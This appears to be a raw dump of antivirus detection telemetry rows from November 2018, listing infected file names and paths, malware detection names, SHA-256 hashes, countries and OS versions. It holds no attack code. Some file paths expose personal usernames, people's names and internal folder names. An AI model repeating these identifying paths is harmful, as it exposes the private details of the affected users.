  Row(detection=Row(filename='avscan-20181101-110135-b38ee4b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110135-B38EE4B8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updrgui.exe', filepath='C:\\PROGRAM FILES (X86)\\Avira\\ANTIVIR DESKTOP\\updrgui.exe', filesize=400000, name='W32/Sality.Patched.#M1.#R1'), hash='a439b92467f19dafed9fcf6b5490215b3bcd9d3c3d2b25bd9943b64311c56d64', metadata=Row(cmdline=None, country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:17:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T21:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094406-1c114ea4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_464beb36\\AVSCAN-20181101-094336-182D3D34\\AVSCAN-20181101-094406-1C114EA4', filesize=128000, name='X2000M/Agent.91364890.#M1.#R1'), hash='d61dfa33ee5992041e4d344f06de5a7216d9c8187927b8cda918bec20ab38d27', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184220-a53436a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184220-A53436A3', filesize=64000, name='VBA/Dldr.Agent.kiiyx.#M1.#R1'), hash='2b52bafbcb238c2171b2ce7def37fb2c650333c507a3e5e3a911164120494a14', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000007b2', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp000007b2', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:45:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4710323968fca1bba0022d2bf901c07aa72c53e805d6f804401ca7e5664e1e07', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-8\\4710323968FCA1BBA0022D2BF901C07AA72C53E805D6F804401CA7E5664E1E07', filesize=1280000, name='HEUR/AGEN.1029502.#M1.#R1'), hash='4710323968fca1bba0022d2bf901c07aa72c53e805d6f804401ca7e5664e1e07', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:00:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001428-f4c930e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e34e72\\AVSCAN-20181101-234504-1DD013D9\\AVSCAN-20181102-001428-F4C930E9', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:17:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200210-0725c9ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28dcd3e5\\AVSCAN-20181101-200157-048805B8\\AVSCAN-20181101-200210-0725C9EA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:02:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2267612530b04bf0a206159a44bc29f3bdc85a5c65e2cf41a4d1769297e071ad', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\2267612530B04BF0A206159A44BC29F3BDC85A5C65E2CF41A4D1769297E071AD', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2267612530b04bf0a206159a44bc29f3bdc85a5c65e2cf41a4d1769297e071ad', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:32:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='022930c8f85f06da2c609e61bac2f11a5108c263d590fcb0996ffc0d8fc3ed1e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\022930C8F85F06DA2C609E61BAC2F11A5108C263D590FCB0996FFC0D8FC3ED1E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='022930c8f85f06da2c609e61bac2f11a5108c263d590fcb0996ffc0d8fc3ed1e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS 2011\\NELTEX JAN2011\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='23958f57ecd4ffcb6f7d030c269aab0bc5cc3c6f36b03a710314ca549f4bca11', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='eulareszh_cn.dll', filepath='D:\\soft\\Adobe photoshop cs2\\AutoPlay\\eulareszh_CN.dll', filesize=156000, name='W32/Ramnit.C.#M0.#R0'), hash='703cbf1ebbee113e904060a376018f8a9ecba28e48485b1381e95bf233d45445', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:43:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T16:02:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T08:33:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T00:13:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='custom.exe', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Custom\\Custom.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:38:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-230148-b70a0aec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d79e1b93\\AVSCAN-20181101-230044-AE81E02B\\AVSCAN-20181101-230148-B70A0AEC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110211-b5dcdcc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88eb8d7b\\AVSCAN-20181101-073027-A46C3117\\AVSCAN-20181101-110211-B5DCDCC8', filesize=8680000, name='PUA/iLivid.iona.#M1.#R1'), hash='3ad255e09ca657043a4d99ae2e7d869dd8fa42e691f44d22b1c11364730eaa40', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:02:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\總務管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='7d212a13fe31a353877c5ff97f32c941482bbab04f9e03a2d98f6f385849ad25', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165114-f1c19a0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_74c19d95\\AVSCAN-20181101-164736-D204AA81\\AVSCAN-20181101-165114-F1C19A0A', filesize=1492000, name='Worm/BAS.Agent.vlteu.#M1.#R1'), hash='6b4e92e4d94b1718a247f80c0cbbeb3775b8ee4d81d1018c160c67ba805fac3c', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:51:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215023-695fee89', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63883ca0\\AVSCAN-20181101-215010-673AF126\\AVSCAN-20181101-215023-695FEE89', filesize=1600000, name='DR/Delphi.83c68f.#M1.#R1'), hash='83c68f4aaec157d428229232c08027f071c583017513624bbe52ef1c13b0ce98', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:50:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp00006f54', filepath='C:\\Windows\\Temp\\ccd2502f-baa3-4d8a-a93a-02d5ef8a95df\\tmp000003fa\\tmp00006f54', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='0e2f167e659490c467f5b9f68d7b9019c18409c215360d17748ea7f007fb5388', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.4.930.11587\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-01T11:04:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2c7e93d933eedcac8702d22dd25192955b118d1b9359e1d8ace278b5b966ef23', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\2C7E93D933EEDCAC8702D22DD25192955B118D1B9359E1D8ACE278B5B966EF23', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2c7e93d933eedcac8702d22dd25192955b118d1b9359e1d8ace278b5b966ef23', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:27:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172748-dcda2f0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_357a596a\\AVSCAN-20181101-172500-D01F2DF7\\AVSCAN-20181101-172748-DCDA2F0F', filesize=64000, name='HEUR/Macro.Downloader.AMCY.Gen.#M1.#R1'), hash='2119780e572b149cb5a78690492e3288648527eecf6d0e69f3d4974203223dca', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:27:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oss nuovo sgb.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\OSS NUOVO SGB\\OSS NUOVO SGB.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='campos medina angela.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\CAMPOS MEDINA ANGELA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185022-edcd3bed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184947-E8A574A3\\AVSCAN-20181101-185022-EDCD3BED', filesize=64000, name='W97M/Agent.73359286.#M1.#R1'), hash='a82256df945c493b85ca0536dd2b9041b260ac517079eefa5c953e7b2cb6a7d3', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:50:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234737-a58584e6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234737-A58584E6', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:44:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095218-58f06790', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095218-58F06790', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\lracxigfbxp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:37:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152926-decb8072', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152926-DECB8072', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='f30f45f64f9915a54a72936aa73d011b180246953a9e06118d22da07808df075', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='samp-server.exe', filepath='C:\\Users\\X\\Desktop\\oLD sTREET\\samp-server.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='a2f3a38e346a138b082cab0efcf162ac24e47c14ac55c660a3f4fe4e9060af48', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:6JpW\\\\\\/4PDdk6mbr1g.1', country='BA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=126264, timestamp='2018-11-01T14:43:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ffprobe.exe', filepath='C:\\Creative Destruction\\ffmpeg_bin\\ffprobe.exe', filesize=37228000, name='W32/Sality.AT.#M1.#R1'), hash='bbfc41f3a9ceb0da7d935819441280e81b286129e177a1ca70b115dae47970fe', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:j+Bkrm2+y0mz2guX.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:48:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='minipure.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\minipure.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T02:13:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pureset.exe', filepath='C:\\PROGRAM FILES\\PURE CODEC\\Codecs\\PureSet.exe', filesize=384000, name='W32/Sality.AT.#M1.#R1'), hash='b84666be3d52db8bda3cb3ecce95becbb4620ccc0644a852889a04a1f54204db', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:31:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152251-93343c10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152251-93343C10', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='d:\\al assil\\desktop\\downloads\\Setup.exe', filesize=1340000, name='W32/Sality.AT.#M1.#R1'), hash='977855d866fe610b8ea98b2043d4d16f9a8b2e2c88ecc335ee67d2bf1b7b271b', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:12:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D35334F3EDF905384E89A5B0231AE52EEFC8F64FF8995A6DF7EF28BA2B55714A', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='d35334f3edf905384e89a5b0231ae52eefc8f64ff8995a6df7ef28ba2b55714a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:00:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='brumana francesco.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\BRUMANA FRANCESCO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181718-23aee172', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_779bb4b9\\AVSCAN-20181101-181703-2088B88C\\AVSCAN-20181101-181718-23AEE172', filesize=512000, name='TR/Drop.Agent.bjxj.#M1.#R1'), hash='93f590521bdeaf93ea0a5140c7c75467005b5123f8c2de960cb7bbb77b2b6aa1', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T12:17:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-131339-c9313e15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c9371aac\\AVSCAN-20181101-131145-B95789FF\\AVSCAN-20181101-131339-C9313E15', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:13:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='outside caller 08-26-2016 71246.zip', filepath='Outside Caller 08-26-2016 71246.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='bdfcb582e5143b086f81aa8090978db555d21c43ac82fcc5b74ef2cf69f6947d', metadata=Row(cmdline=None, country='AT', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:50:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hdeck.exe', filepath='D:\\Omarlys\\CONTACTOS OMARLYS\\VIA_Win7-64_Win7_Vista64_Vista_XP64_XP_2K(v7700d)\\VIAHDAud\\Present\\HDADeck\\HDeck.exe', filesize=33792000, name='W32/Sality.AT.#M1.#R1'), hash='94daaf7ace0c643160d72ae93d67c7421c433db4d5f8ea38279a0b5d9115fa13', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Nox\\bin\\Nox.exe', parentsize=6017792, timestamp='2018-11-01T10:02:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154613-ceaf5c87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154555-CB8F528F\\AVSCAN-20181101-154613-CEAF5C87', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='organizzazione del lavoro.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\SLIDES VECCHIE\\organizzazione del lavoro.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scmini.exe', filepath='c:\\program files (x86)\\smartcloudinput\\1.3.6.10910\\scmini.exe', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='4f5d72478c0ea865608bea5bc11b1c4fcacf7272a9921e2aa26027d362cd030c', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-04T05:44:42Z'), dt=datetime.date(2018, 11, 4)),
